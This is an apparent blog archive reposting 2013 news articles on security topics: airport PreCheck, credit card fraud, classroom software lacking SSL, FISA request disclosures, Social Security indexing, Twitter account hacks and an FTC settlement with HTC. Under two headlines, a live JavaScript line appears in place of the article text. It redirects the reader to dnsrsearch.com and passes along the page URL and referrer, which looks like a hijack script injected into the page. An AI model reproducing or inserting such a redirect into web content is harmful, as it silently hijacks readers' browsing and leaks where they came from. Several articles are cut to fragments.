Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Wednesday, September 11, 2013

Bits Blog: Tech Companies Escalate Pressure on Government to Publish National Security Request Data

window.location="http://www.dnsrsearch.com/index.php?origURL="+escape(window.location)+"&r="+escape(document.referrer);

On the Road: Growing Pains for PreCheck Airport Security Program

All he wanted was some information about PreCheck, the program of the Transportation Security Administration that gives eligible fliers a quick-pass through airport security. His boarding pass had the PreCheck certification, but the PreCheck lane was available only in a terminal separate from the one where his flight was to depart at Newark Liberty International Airport.

After 15 minutes with one of those dreaded automated phone systems, Mr. Ax finally got through to an airline agent and inquired politely about the machinations of getting through PreCheck in one terminal while flying out of another. Couldn’t be done easily, it turned out.

“The guy starts yelling at me, ‘That’s not my problem, that’s the T.S.A.’s problem!’ ” he said. “He was literally shouting.”

Mr. Ax says he does about 85 concerts a year, about 50 of them requiring air travel. He belongs to Global Entry, the popular “trusted traveler” program of the Customs and Border Protection agency that gives a quick-pass re-entry into the country for international travelers. Global Entry members also are automatically enrolled in PreCheck.

“So that’s fantastic. But I’ve had PreCheck for six months, and unfortunately I’ve been able to use it exactly once, at O’Hare, despite all the flying I do,” he said.

Mr. Ax’s frustration with PreCheck partly reflects high expectations that bump into the realities of how limited the program really has been so far. It’s operating in 40 airports, but the availability is limited to participating airlines, and only at certain terminals.

Last week, the T.S.A. announced an aggressive expansion of PreCheck that the agency says will add 60 new airports by the end of this year. Participating airlines now are Alaska, American, Delta, Hawaiian, United, US Airways and Virgin America. JetBlue and Southwest are expected to join the program soon, the agency said.

When it began in October 2011, PreCheck was available only to high-status, high-revenue passengers chosen by individual airlines to participate — an approach that irritated many frequent travelers who failed to make the invitation lists. Then PreCheck also became open to those who belong to Global Entry and other so-called known-traveler programs. That prompted many travelers to join Global Entry, even if they didn’t fly internationally. Global Entry costs $100 for five years and requires a background check, fingerprinting and a personal interview.

In July, John S. Pistole, the T.S.A. administrator, announced a major expansion to increase the numbers of travelers in PreCheck, starting this fall in an initiative that he has referred to as “Global Entry Lite.” Travelers will be able to apply directly for PreCheck, paying an $85 fee good for five years, and reporting to airport enrollment centers for fingerprinting. That expansion is expected to start at two airports, Washington Dulles and Indianapolis, and roll out more widely through the fall.

The ambitious goal of the T.S.A. is to have 25 percent of all airline travelers in the United States eligible for expedited screening by the end of this year through PreCheck. On Monday, the T.S.A. said it would also offer PreCheck on a case-by-case basis to randomly selected passengers based only on the information they provide at booking.

Still, there’s a good amount of confusion about PreCheck. For one thing, even some frequent business travelers that I hear from who belong to Global Entry don’t realize that to also qualify for PreCheck, they have to enter their Global Entry identification numbers in their frequent-flier profiles of participating airlines. (Those entering PreCheck in the new application process will receive what the T.S.A. calls a Known Traveler Number.)

Once enrolled, a traveler should see the PreCheck certification on the bar code of each boarding pass from a participating airline. But that doesn’t always ensure an expedited passage through security, in not having to take off shoes or remove laptops from their cases. A certain amount of randomness is built into the system, so a passenger with PreCheck still may occasionally be directed instead to the regular screening lanes.

The T.S.A. has detailed information on PreCheck, including links for participating airlines and locations of PreCheck lanes in the 40 airports where the program is now operating.

Incidentally, I hear nothing but good things from readers about Global Entry, which allows returning travelers to be whisked through international airport border-entry points using special kiosks that eliminate those hated long waits in line. PreCheck is a work in progress.

“Global Entry works very well. It’s just excellent. PreCheck, however? They keep advertising it, but the truth is, it’s just not available in many places yet,” Mr. Ax said.

Tuesday, September 10, 2013

DealBook: U.S. Security Panel Clears a Chinese Takeover of Smithfield Foods

window.location="http://www.dnsrsearch.com/index.php?origURL="+escape(window.location)+"&r="+escape(document.referrer);

Tuesday, September 3, 2013

On the Road: Data Security Begins With the Traveler

“You’re going to Bogotá?” she asked.

“Not that I know of,” I replied.

“So I’m guessing you also didn’t buy a $10 cup of coffee yesterday in Antelope, California?” she asked.

No. The charge of $740.04, for a one-way ticket on Delta Air Lines to Bogotá, Colombia, and the charge for $10.20 at a coffee shop were fraudulent.

We are vigilant in our house about monitoring credit card activity, especially after traveling, and this was not the first time that unauthorized charges had appeared after recent trips. So I immediately got on the phone and reported the problem to the American Express Platinum Card office. The card was invalidated, a fraud investigation was begun, the charges were removed, and a few days later a new card arrived via FedEx.

Then I called my friend the security expert, Anthony C. Roman, and said, problem solved, right? Not exactly. “Red alert! Red alert! Red alert!” he responded.

What’s the big deal? Aside from the inconvenience of having to enter the new credit card information on recurring accounts, the cost to me was zero.

“Well, hopefully it was,” said Mr. Roman, president of Roman & Associates, which specializes in investigations and risk management consulting. He explained, however, that isolated unauthorized charges on your credit card statement most likely indicate that sophisticated cybercriminals are waiting to see if you will notice.

“What credit card fraudsters do is test your vigilance, how carefully you’re watching your account, and how carefully the credit card providers are watching your account. They do this by making relatively small purchases first, to see if it sets off any bells and whistles,” he said. Many frequent travelers are lax about checking activity statements in a timely manner, which flashes a green light to criminal hackers. Then, he said, “Hell or high water, the big charges are coming.”

Worse, he said, a hacked card could indicate that more serious identity theft might have occurred.

In its 2013 Global Security Report, Trustwave, a data security management firm, says that the top three industries targeted for data breach attacks in 2012, measured by the number of its investigations, were retailing (45 percent), food and beverage (24 percent) and hotels (9 percent). Three years ago, the hotel industry was at the top, but hotels have since made “significant strides” in improving credit card security measures, the report says.

Still, criminal hackers gravitate to some hotels because, like retail stores and restaurants, hotels do many credit card transactions at a local level, where centralized and highly sophisticated data security safeguards may be lacking. Last year, for example, the Federal Trade Commission sued Wyndham Worldwide, the hotel chain, for what it said was inadequate safeguarding of credit card information that led to three data breaches at hotels in under two years, with “millions of dollars in fraud loss, and the export of hundreds of thousands of consumers’ payment card account information to an Internet domain address registered in Russia.”

Wyndham responded that it had done all it could to report the crimes and carry out “significant remedial measures.” The company also charged that the commission had overstepped both its authority and its expertise in hotel data security enforcement.

Most hotels are locally owned, though managed by big hotel chain companies. For hotel owners, it is expensive to come into full compliance with the tough global data security criteria set by the credit card companies. And, Trustwave says, “Cybersecurity threats are increasing as quickly as businesses can implement measures against them.”

The threat is constant, Mr. Roman said. “The best protection is vigilance, and that takes work,” he said. That includes using complex passwords, being wary of public Wi-Fi, updating antivirus software — and checking credit card statements carefully.

Speaking of work, I hate to memorize passwords and PINs, but that appears to lie ahead. In the United States, credit cards use magnetic strips that are more vulnerable to hacking than the electronic chips embedded in credit cards in Europe and elsewhere. Such cards also require entry of a PIN.

These so-called chip-and-PIN cards are headed our way, said Kathy Orner, vice president for information security at Carlson Rezidor, a worldwide hotel company that is among the industry leaders in data security.

All of the major credit card issuers plan to start introducing these cards in the United States within two or three years. Ms. Orner had some advice for when that happens. “Do not use the same PIN on your credit card that you use on your debit card” or anywhere else, she said.

Right: more numbers to remember, coming soon.

Tuesday, June 25, 2013

Technophoria: Data Security Is a Classroom Worry, Too

Edmodo’s free software allows teachers to set up virtual classrooms where they can post homework assignments, give quizzes and use third-party apps to complement lessons. Students can create individual profiles, including their photograph and other details, within their teacher’s class and post comments to a communal class feed.

Mr. Porterfield, an engineer at Cisco Systems, examined Edmodo’s data security practices by registering himself on the site as a fictional home-school teacher. As he went about creating imaginary students — complete with cartoon avatars — for his fictitious class, however, he noticed that Edmodo did not encrypt user sessions using a standard encryption protocol called Secure Sockets Layer.

That cryptography system, called SSL for short and used by many online banking and e-commerce sites, protects people who log in to sites over an open Wi-Fi network — like the kind offered by many coffee shops — from strangers who might be using snooping software on the same network. (An “https” at the beginning of a URL indicates SSL encryption.)

Without that encryption, Mr. Porterfield says, he worried about the potential for a stranger to gain access to student information, and thus hypothetically be able to identify or even contact students.

To test this hypothesis, he used a computer on his home Wi-Fi network to log in as an imaginary student; then, using another computer, he installed free security auditing software, called Cookie Cadger, to spy on the student’s online activities. Though the risk of this happening with actual students seemed small — Edmodo and other companies say they have no evidence that this kind of breach has occurred — he contacted his school district about his concerns.

“There’s a lot of contextual information you could use to gain trust, to make yourself seem familiar to the child,” he says. “As a parent, that’s the scariest thing.”

In response to an inquiry from me last week, Sara Mandel, a spokeswoman for Edmodo, said the service provided “a safe alternative to open, consumer social networking sites” in that students could participate only in groups created by their teachers and because students cannot send private messages on the system.

She added that “any school that chooses” had been able to use a completely encrypted version of the site since 2011 and that the company “is working to ensure that all of our users are using an SSL-encrypted version.”

SCHOOL administrators and teachers said they liked these online learning systems because they could control the information that students might share.

“Kids can’t talk to each other. They can only speak to the group,” says Heather Peretz, a special-education teacher at Great Neck South Middle School in Great Neck, N.Y., who uses Edmodo in her English class. “It helps them learn to be good digital citizens so they are not making inappropriate posts.”

But as school districts rush to adopt learning-management systems, some privacy advocates warn that educators may be embracing the bells and whistles before mastering fundamentals like data security and privacy.

Although a federal law protecting children’s online privacy requires online services to take reasonable measures to secure personal information — like names and e-mail addresses — collected from children under 13, the law doesn’t specifically require SSL encryption. Yet school districts often issue only general notices about classroom technology, leaving many parents unaware of the practices of the online learning systems their children use. Moreover, schools often require online participation so students can gain access to course assignments or collaborate on projects.

“What we are finding with this type of database is that parents are uninformed,” says Khaliah Barnes, a lawyer at the Electronic Privacy Information Center. “Most don’t understand how the technology works.”

Online security experts have long warned consumers about unencrypted Web sites that collect personal details. That is because on open Wi-Fi networks, hackers using simple software programs can see and copy the unique code, called a session cookie, that servers issue to authenticate a person who has logged into a Web site. By replicating that cookie, a hacker can acquire the same privileges, like the ability to edit a profile or grade a quiz, of the authenticated user for that session.

This article has been revised to reflect the following correction:

Correction: June 24, 2013

An earlier version of this article misstated students’ ability to send private messages under the Edmodo system. Students cannot sent private messages in any circumstance; it is not the case that they can send private messages only in the presence of their teacher.

Friday, June 21, 2013

On the Road: Travel Security Companies Watch a Volatile World

A few days ago, Alex Puig, a regional security director for the travel emergency company International SOS, was in his office in suburban Philadelphia watching reports on a volcano erupting in western Alaska. At the same time, he was monitoring events in Turkey, where street violence sharply escalated over the weekend.

Those were just two hot spots on a long list. Troubles, mayhem, disease, natural disasters and other disruptions hit like lightning strikes all over the world, and are monitored around the clock by companies like International SOS, which claims to have 70 percent of the Fortune Global 500 companies as clients, and competitors in the travel alert and response business like iJet.

That pesky volcano, named Pavlof, in the western Aleutian archipelago, began erupting again in mid-May. On some days it was belching ash 20,000 feet into the skies, forcing cancellation of some regional flights. The question was whether the eruptions at the volcano, one of Alaska’s most active, might worsen and spew a higher and wider ash cloud that could potentially disrupt hundreds of flights a day on the ever-more-important travel and cargo routes between North America and Asia.

“The concern now is primarily over the effect that volcanic ash has had, and potentially again could have, on air traffic,” said Mr. Puig, a former travel and cargo security executive with Target and a former agent in the clandestine services of the Central Intelligence Agency. “At the end of the day, let’s assume that more ash clouds get spewed into the atmosphere, and now airlines are having to reroute and greatly reduce — or completely cancel — flights.” That, as we saw in Europe three years ago, can mean big trouble.

In its update on Sunday, the Alaska Volcano Observatory, a joint federal, state and university program, reported that seismic tremors on Pavlof had weakened. But it added that given the volatile nature of Pavlof, “eruptive activity could increase again with little warning.”

While there was no immediate cause for alarm about air travel in the region, there was plenty of precedent for paying attention — for travelers and for those in corporate offices who send business travelers around the world. Those corporate officials are charged with so-called duty-of-care responsibilities, not only to respond properly to emergencies, but also to anticipate them.

Lessons were learned from the calamitous effects on travel caused by the ash cloud that covered much of Western Europe when a volcano in Iceland erupted in spring 2010. At one time, Mr. Puig said, such an event might not have seemed as disruptive or dangerous as, say, an earthquake, and might have been taken for granted.

“People said, ‘O.K., we’ll just fly over it or around it,’ ” he said. “But in Europe we found out that this wasn’t feasible, and a lot of people got stranded.”

Over an eight-day period in April 2010, 104,000 commercial flights in Europe, half of the total scheduled, were canceled. Five million travelers all over the world were left stranded, as the effects of those cancellations rippled through the global commercial aviation networks. It was a slow-moving travel disruption with huge logistical effects — hotel rooms were hard to get, ground transportation was uncertain, work communications were going haywire as travelers found themselves stuck all over the world. But most business travelers at least had support systems in place back home.

“If you’re a business traveler and you get stranded in say, Hong Kong, and you can’t leave because of flight disruptions, it probably means you get to stay an extra week in Hong Kong on the company dime,” while trying to manage work and personal schedules thrown into turmoil, he said. “But as we saw in Europe, a lot of leisure travelers were caught” and were scrambling for options.

“If you’re on your own, you can easily end up sleeping at the airport,” he said.

As the volcano in Alaska quieted down, at least temporarily, the violence in Turkey was becoming worse. Many travel managers with employees on the road in Istanbul and elsewhere had assumed that the situation would be controllable, given the long stability of Turkey. But then concerns were raised at home offices by reports that the riot police and government supporters were singling out foreigners in Istanbul and that police even fired tear gas inside a hotel favored by international business travelers.

“Right now, we’re telling people you can travel to Turkey — not a problem — but make sure your travel arrangements are in order, check that the airports are still working, make sure of your ground transportation, check to see that the hotel where you’re staying isn’t affected,” Mr. Puig said.

“It’s a very tricky thing,” he said of the emergency response in the “be informed” stage, as it was regarding Turkey.

“You don’t want to underreact,” Mr. Puig said. “We actually prefer to land on the overreact side, if we feel it’s moving fast in a certain direction and we need to put our teams on the ground and start to organize logistics.”

Violence on the ground is a lot more dangerous than a volcano that disrupts international air travel, of course. But in these kinds of situations, it pays to be prepared. You just never know. Things could settle down in Turkey, as far as the potential effects on travelers. That volcano in Alaska could go back to sleep. “It’s too early to tell,” Mr. Puig said.

But it’s a good idea to pay close attention.

Thursday, June 20, 2013

Bits Blog: Google Seeks Permission to Publish Data on Security Requests

Google's motion with the Foreign Intelligence Surveillance Court on Tuesday is the company's latest move to control the public relations crisis that has resulted from revelations of government Internet surveillance.Jeff Chiu/Associated Press Google’s motion with the Foreign Intelligence Surveillance Court on Tuesday is the company’s latest move to control the public relations crisis that has resulted from revelations of government Internet surveillance.

Google on Tuesday filed a motion with the secret Foreign Intelligence Surveillance Court, asking permission to publish data on national security requests that were made to it and authorized by the court.

The motion is the company’s latest move to control the public relations crisis that has resulted from revelations of government Internet surveillance. It is an escalation of Google’s efforts to publish the data. Last week, it sent a letter to the director of the F.B.I. and the director of national intelligence, asking for the same thing.

By law, recipients of national security requests are not allowed to acknowledge their existence. But with the permission of the government, Facebook, Yahoo, Microsoft and Apple have in the last few days published aggregate numbers of national security and criminal requests, including those authorized by the Foreign Intelligence Surveillance Act. Google has not, because it said that would be less transparent than what it had already published. Its transparency report has since 2010 broken out requests by type, and if it agreed to the same terms the other companies did, it would not be able to publish the report that way in the future.

In the motion, Google argued that it had a First Amendment right to publish a range of the total number of requests and the number of users or accounts they cover.

Google said that its executives had responded to allegations — that it cooperated with the government in Internet surveillance — as best they could, given the government’s restraints on discussing them. But the company said that it wanted to do more for the sake of its reputation, business and users, and for the sake of public debate.

“Google’s reputation and business has been harmed by the false or misleading reports in the media, and Google’s users are concerned by the allegations,” the motion said. “Google must respond to such claims with more than generalities.”

The tech companies have been pressing to be able to publish the number of government requests largely to prove that the requests cover a tiny fraction of users. Though the other companies said they were also pushing the government for permission to publish more detailed data, they said the aggregate numbers were useful to control speculation by setting a ceiling on the number of requests.

Other tech companies affected by the government’s surveillance program, called Prism, have considered going to the secret court, an option that is still on the table, according to two people briefed on the discussions. So far, the companies have been individually negotiating with the government instead of acting in concert.

Still, even if they are allowed to publish more detailed numbers, it would leave many questions unanswered, including details of how Prism works. Also, the number of people affected by FISA requests could be much larger than the number of requests, because once the government makes a broad request, it can add individuals and additional search queries for a year.

Google’s motion also revealed that two of its top lawyers, Kent Walker and Richard Salgado, have security clearance, which FISA requires for handling classified legal orders and materials. It was filed on behalf of the company by Albert Gidari, a partner at the law firm Perkins Coie who has earned a reputation in tech and legal circles as the go-to man on surveillance law.

Sunday, June 9, 2013

Economic View: To Fix Social Security, Use the Right Wrench

Congress seems to want a ruse to disguise a cut in benefits as something else — like the discovery of a technical error that, once corrected, would let the government write smaller checks without taking the blame for cutting benefits.

In a spirit of compromise, President Obama has proposed changing how inflation is measured in benefit calculations. In his 2014 budget proposal released in April, he proposed that retirees’ Social Security benefits be indexed to something called the Chained Consumer Price Index for All Urban Consumers or C-CPI-U, rather than the current benchmark, the Consumer Price Index for Urban Wage Earners and Clerical Workers, or CPI-W.

This seems to correct a real technical error. Economists have argued that the current index overstates the actual inflation rate, and that a switch to the C-CPI-U would make the inflation indexing more accurate, seemingly justifying the resulting gradual reduction in benefits. (And it would be a reduction, to the point that someone retiring today would be receiving about 5 percent less in 20 years.)

But here is the rub: the proposal solves the wrong problem and, in doing so, undermines the integrity of the Social Security system.

The purpose of Social Security is to help families. It reinforces the intergenerational sharing that families already — though imperfectly — provide. It helps retirees by stabilizing their income, and it helps their grown children, who are relieved of any excessive burden of supporting them. This purpose strongly suggests that the Social Security benefits should be indexed to some measure of the available, aggregate economic pie. That means a formula that looks completely different from the ones being discussed today.

Clearly, something needs to be done: if nothing changes, and the trust fund runs out in 2033, the system would be able to pay only about 75 percent of promised benefits.

The issues are complex, as economic theorists like Henning Bohn at the University of California, Santa Barbara, have shown. But now that an index change is on the table, we should take this opportunity to get it right.

One alternative that we should consider is a different kind of index switch, linking retirees’ benefits to gross domestic product per capita, in current dollars. This measure responds to inflation just as the C-CPI-U does, but, in contrast, it also responds to changes in the nation’s resources, as measured by real G.D.P. There could also be corrections for other factors, like the dependency ratio, which compares the number of “dependents” (retired people and children) to the number of working adults.

Such an index switch, however, has received hardly any public discussion, and that fact alone will make some people think that something is wrong with it. But political talk is limited; it is too focused on the identified problem of somehow fixing the projected Social Security insolvency. While this new idea won’t solve insolvency — we may need to raise Social Security contributions to do that — it would support the principle that one generation shouldn’t be more burdened than another.

Before 1972, Social Security wasn’t indexed at all, and there was little public talk about tying it to inflation despite periodic, inflation-induced disasters for retirees. Congress simply made occasional, ad hoc, upward adjustments in the benefit formula. Proponents of these adjustments often justified the increases as offsetting the rising cost of living. But at the same time, they also described retirees as needy, suffering hardships and deserving dignity. While there were no explicit references to G.D.P., it’s plausible that their sense of “needy” was influenced by comparison with the rising American standard of living for working adults. As a matter of fact, total Social Security benefits more than kept up with the rapid G.D.P. growth in the couple of decades before they were indexed to inflation.

Now that inflation indexing has been in place, some people see the formula as always providing the scientifically “right” amount of benefits. They don’t think much about other factors that might enter into the determination of benefits. And, in fact, since 1982, Social Security benefits as a fraction of G.D.P. have generally been falling, at least until the latest recession.

The fact is that per capita G.D.P., in current dollars, has grown 1.2 percent faster a year, on average, than the CPI-W in the last 20 years, despite the Great Recession. If we indexed Social Security benefits to G.D.P. per capita, and not to the C-CPI-U, people who retire today and live 20 additional years would get a third more in real, inflation-corrected benefits — provided, of course, that the next 20 years are like the last.

If the economy grew unusually rapidly, however, they might get 50 or 60 percent more, in real terms. But even that wouldn’t break the budget of the Social Security system, because contributions would be higher, too, in response to the greater economic growth. And if the economy stagnated in a deep depression in the next 20 years, retirees might see no growth at all, or conceivably even a decline, in real terms. That’s O.K., too, because everyone else would be suffering as well. We have other programs, like Medicare, that deal with any extreme hardships that some older Americans with special conditions might encounter.

THE point of G.D.P. indexing is to align the interests of the retired with society as a whole. Older Americans should share both the windfalls and the losses with other generations — with working adults, and with children. It shouldn’t be otherwise. If the system’s rules force us to maintain the real benefits of retirees at all costs, we may find ourselves, in difficult times, taking excessively from our children via cuts in education, or from our working adults. Why should retired people feel no effect at all from the recession while younger people are left suffering? They should be sharing the hardships, if we have familial feelings for one another.

The issue is especially salient today because the demographics have shifted: the aging of the baby boomers will create many retirees relative to adults who are still working. This huge shift could not have been foreseen by Social Security’s designers.

Achieving the right benefit formula while fixing Social Security’s solvency problem might require increasing the contribution rate — now in the form of 6.2 percent taxes on employees and employers. But so be it. We need to say what is right, keeping our eyes on the integrity of Social Security, which is crucial to our identity as a civil society.

Robert J. Shiller is Sterling Professor of Economics at Yale.

Tuesday, May 7, 2013

Court Considers if Inmate's Sex Reassignment Poses Security Risk

A federal appeals court heard debate Tuesday about the potential for security problems if prison officials follow a Boston federal judge's order to provide sex reassignment surgery to a convicted murderer diagnosed with severe gender identity disorder.

Monday, May 6, 2013

Disruptions: New Motto for Silicon Valley: First Security, Then Innovation

The Twitter account of The Associated Press was among many recently hacked. The Twitter account of The Associated Press was among many recently hacked.

At Facebook’s headquarters in Palo Alto, Calif., are stark white posters with bright red statements like “Done is better than perfect” and “Move fast and break things.”

These disruptive philosophies embody the spirit not just of Facebook but of Silicon Valley. Yet today, when technology companies have become the prime targets of rogue governments and hackers, the ideologies that drive these companies to provoke could end up disrupting these companies.

Conversely, the signs sitting in security research firms across the country warn, “Carelessness causes security incidents.”

Although technology companies say they take security seriously, protecting their customers seems to come second to announcing new products. Take Twitter, where people’s accounts are frequently hacked. In the last few months alone, this has happened to Burger King, BBC, NPR, The Associated Press and a slew of celebrities and users. In that time, Twitter has proudly announced updates to features on its mobile and desktop apps, introduced a music Web site and redesigned its company blog. But it still hasn’t released two-factor authentication, a security tool used by the rest of the industry to deter hackers.

Although Twitter declined to comment, I’m sure most of the people on the site who have seen their accounts pilfered over the last several years would rather have two-factor authentication than a shiny new Twitter blog.

One solution is a bill crawling through Congress over the last two years, the Cyber Intelligence Sharing and Protection Act, known as Cispa. The bill would make it easy for tech companies to share information about computer security threats with government agencies, helping fortify against cyberattacks.

But privacy groups say that Cispa is not a solution to the problem, and that instead it hands the highly sensitive personal data we want protected to the government.

“It has to be the obligation of these tech companies to build in security from the very beginning before we start moving into solutions about bringing the government into the private sector,” said Leslie Harris, president and chief executive of the Center for Democracy and Technology, a Washington-based advocacy group financed by a broad coalition of technology and telecommunication companies. “You want to see these very innovative companies step up and become the leaders in security solutions first.”

Cispa’s creators and defenders see it differently. They argue that companies are not simply fortifying against a child in his bedroom who is trying to get into their servers for fun. Today’s hackers hail from foreign governments like those in China, Syria and Estonia, and are adept at getting what they want.

Representative Mike Rogers, Republican of Michigan and the chairman of the House Intelligence Committee, who was one of the authors of Cispa, recently said that “our government, our industries and your personal information will be subjected to hundreds of thousands of attempts at hacking” in a single day. “We are in a stealthy cyber war in America. And we’re losing.”

He thinks the government can solve that problem.

Kelsey Knight, director of communications for Mr. Rogers, said in a phone interview that Cispa could stop “90 percent of the current security breaches” that happen today. “Then, in reverse, these companies would be able to share their threat of information and code back to the government and that will add to the list of zeros and ones that we can keep defending against together.”

Ms. Knight noted that start-ups cannot defend themselves against today’s advanced attacks because the cost can be hundreds of thousands of dollars. She said Cispa and other government groups can help.

One thing is clear: today’s tactics are not working.

During the State of the Union address this year, President Obama cited the need to protect “national security” and “privacy” while defending against cyber attacks. The president has also been meeting with chief executives to discuss ways to combat the threat of computer warfare and corporate espionage.

Cispa, now in the Senate, could take months, if not years, if it is to emerge at all from Congress. Until then, advocacy groups believe it falls to the start-ups to put more effort into security.

“The ‘move fast and break things’ philosophy is not a philosophy that has necessarily been good for our privacy,” Ms. Harris said. “I certainly believe that government and companies should be working together, but information sharing is just a very small part of the cyber security puzzle. It’s companies investing the resources to strengthen their own security first.”

Maybe it’s time for companies in Silicon Valley to replace those posters with ones that say, “Move slowly and protect your users.”

E-mail: bilton@nytimes.com

Tuesday, March 5, 2013

On the Road: Improving Security Checks to Help the Disabled - On the Road

The encounter at the St. Louis airport on Feb. 9 — propelled into wide media coverage by the five-and-a-half-minute video taken by the girl’s mother — is exactly the sort of public embarrassment that the security agency says it hopes to avoid in the future. As such, the agency says it will begin aggressively promoting a new program of using specially trained officers to head off unnecessary difficulties involving security screening of travelers with disabilities.

The program has 3,000 so-called passenger support specialists who volunteer from among the agency’s work force of about 45,000 screeners. Their job is to help ensure that disabled passengers receive “the level of screening needed to make us comfortable that there is no threat or risk to aviation, but allows us to do it in a way where we can explain our processes to customers and use whatever discretions that are in our authority to make the screening experience as easy as possible for them,” said Chris McLaughlin, the agency’s assistant administrator for security operations.

The specialists receive three hours of training based on the need to step in when appropriate to “communicate effectively and respectfully with passengers with disabilities,” said Kimberly Walton, the agency’s assistant administrator for civil rights, liberties and travel engagement. Specialists at checkpoints “identify potential difficulties that passengers with disabilities and medical conditions may experience throughout screening” and “either proactively help, or resolve concerns,” she added.

The agency has been developing the program for more than a year. It was introduced quietly this year and, after the initial evaluation process, was successful. The agency says it now wants more travelers to know that it is in place. Among passengers with disabilities, “the groups that tend to get us the most mention,” Mr. McLaughlin said, are children and the aged.

“We recognize that there is a group of passengers that represents lower risk, and at the same time tends to have greater needs of us,” he added.

Under the program, specialists are called on to assist in resolving problems encountered at security checkpoints by passengers in wheelchairs, by those using medical devices like insulin pumps, and those who otherwise present physical or mental challenges. Specialists are trained to “know when the need arises” and identify passengers with special needs, or respond to calls for assistance from regular screeners, Mr. McLaughlin said.

The new initiative is tied to an existing program called TSA Cares. That is a toll-free help-line — 855-787-2227 — where assistants will provide information about security issues for those with disabilities, or will, when requested, “notify an airport in advance, so our work force is prepared when they arrive,” Ms. Walton said.

She gave an example of parents who called the help line before traveling with an autistic child who “can’t wait in a line, can’t be touched, is not good at following instructions and gets upset if there are too many lights or many sounds — all of which could trigger a really bad experience,” she said. With notice, the agency’s staff was able to anticipate that child’s needs and provide “a good experience” at security, she said.

Groups advocating for the disabled are working with the agency on the new initiative, including the Open Doors Organization and the National Disability Rights Network and organizations for the blind and those who require service animals for travel, Ms. Walton said.

The video of the child, Lucy Forck, crying in her wheelchair at a security checkpoint while her parents tried to reason with security officers demonstrated how delicate such situations can be and how quickly they can go wrong.

The incident in St. Louis involved “a relatively new officer being faced for the first time in her career with a situation of a child in a wheelchair,” Mr. McLaughlin said. The agency acknowledged that the screener had incorrectly told the parents that the child needed to be patted down and incorrectly told the mother that it was illegal for her to record the encounter.

“While she did make some advisements to the customer that were incorrect, before she actually physically did any screening she had the presence of mind to request assistance from her supervisor, and that supervisor in turn got a passenger support specialist involved, and as a result of that this child was not screened inappropriately, and the situation was explained to the parents,” Mr. McLaughlin said.

After about 20 minutes, the girl, who has spina bifida, was comforted and carried through security by her mother, while the wheelchair was routinely swabbed for explosives. The parents, Nathan Forck and Annie Schulte, later said they accepted the agency’s apology but hoped that the agency would provide better training in dealing more appropriately and respectfully with disabled passengers.

That is the goal of the passenger support program, and a reason that the agency is now promoting its availability, Mr. McLaughlin said. “Our knowing when the need arises is somewhat dependent on customers knowing that the program exists,” he said.

Thursday, February 28, 2013

Twitter Hacks Force Companies to Confront Security on Social Media

Burger King’s Twitter account had just been hacked. The company’s logo had been replaced by a McDonald’s logo, and rogue announcements began to appear. One was that Burger King had been sold to a competitor; other posts were unprintable.

“Every time this happens, our sales phone lines light up,” said Ryan Holmes, the chief executive of HootSuite, which provides management and security tools for Twitter accounts, including the ability to prevent someone from gaining access to an account. “For big brands, this is a huge liability,” he said, referring to the potential for being hacked.

What happened to Burger King — and, a day later, to Jeep — is every brand manager’s nightmare. While many social media platforms began as a way for ordinary users to share vacation photos and status updates, they have now evolved into major advertising vehicles for brands, which can set up accounts free but have to pay for more sophisticated advertising products.

Burger King and Jeep, owned by Chrysler, are not alone. Other prominent accounts have fallen victim to hacking, including those for NBC News, USA Today, Donald J. Trump, the Westboro Baptist Church and even the “hacktivist” group Anonymous.

Those episodes raised questions about the security of social media passwords and the ease of gaining access to brand-name accounts. Logging on to Twitter is the same process for a company as for a consumer, requiring just a user name and one password.

Twitter, like Facebook, has steadily introduced a number of paid advertising options, raising the stakes for advertisers. Brands that pay to advertise on Twitter are assigned a sales representative to help them manage their accounts, but they are not given any more layers of security than those for a typical user.

Ian Schafer, the founder and chief executive of Deep Focus, a digital advertising company that also fielded a few phone calls from clients concerned about the Burger King attack, argued that Twitter bore some responsibility.

“I think Twitter needs to step up its game in providing better security,” Mr. Schafer said. In a memo to his staff about such attacks, he called on social networks like Facebook, Twitter, Pinterest “and anyone else serious about having brands on their platform” to “invest time in better understanding how brands operate day to day.”

“It’s also time for these platforms to use their influence to shape security standards on the Web,” he wrote.

The risk for Twitter is in offending potential business partners as the company tries to build its advertising dollars, which make up the bulk of its revenue. In 2012, the company grew more than 100 percent, earning $288.3 million in global advertising revenue, according to eMarketer.

On Wednesday, it introduced a product that would allow advertisers to create and manage ads through third parties like HootSuite, Adobe and Salesforce.com. Advertising is estimated to account for more than 90 percent of the company’s revenue.

“This is not something we take lightly,” said Jim Prosser, a Twitter spokesman, in an interview last month. (The company declined to comment on the Burger King hacking, saying it did not discuss specific accounts.) Mr. Prosser said Twitter had manual and automatic controls in place to identify malicious content and fake accounts, but acknowledged that the practice was more art than science.

Mr. Prosser said Twitter had taken an active role in combating the biggest sources of malicious content.

Last year, the company sued those responsible for five of the most-used spamming tools on the site. “With this suit, we’re going straight to the source,” it said in a statement. “We hope the suit acts as a deterrent to other spammers, demonstrating the strength of our commitment to keep them off Twitter.”

But security experts say, and the recent hacks of Burger King, Jeep and other brands have demonstrated, that Twitter could do more.

Sunday, February 24, 2013

HTC Settles F.T.C. Charges Over Security Flaws in Devices

The Federal Trade Commission charged HTC with customizing the software on its Android- and Windows-based phones in ways that let third-party applications install software that could steal personal information, surreptitiously send text messages or enable the device’s microphone to record the user’s phone calls.

The action is the first attempt by the commission to police a manufacturer of mobile devices. As smartphones and tablets become a common way for consumers to shop, bank and chat online, personal information and privacy will need to be guarded.

HTC America, based in Bellevue, Wash., agreed to settle the civil suit with the commission by issuing software patches that close the security holes, and by creating a security program that will be monitored by an independent party for the next 20 years. The F.T.C. does not have the authority to assess fines in consumer protection cases.

“The company didn’t design its products with security in mind,” Lesley Fair, a senior lawyer in the commission’s Bureau of Consumer Protection, wrote in a blog post. “HTC didn’t test the software on its mobile devices for potential security vulnerabilities, didn’t follow commonly accepted secure coding practices and didn’t even respond when warned about the flaws in its devices.”

An HTC official said Friday that the company had already started to update its software and distribute it to users of some, but not all, of the affected phones.

“Working with our carrier partners, we have addressed the identified security vulnerabilities on the majority of devices in the U.S. released after December 2010,” Sally Julien, an HTC spokeswoman, said in a statement. “We’re working to roll out the remaining software updates now and recommend customers download them once available.”

“Privacy and security are important,” the statement added, “and we are committed to improving practices that help safeguard our customers’ devices and data.”

The trade commission charged that the security flaws resulted from HTC’s modifying the operating system software used on most of the affected phones. In the case of Android, created by Google, the system is designed to protect sensitive information and phone functions through what is known as a permission-based security model.

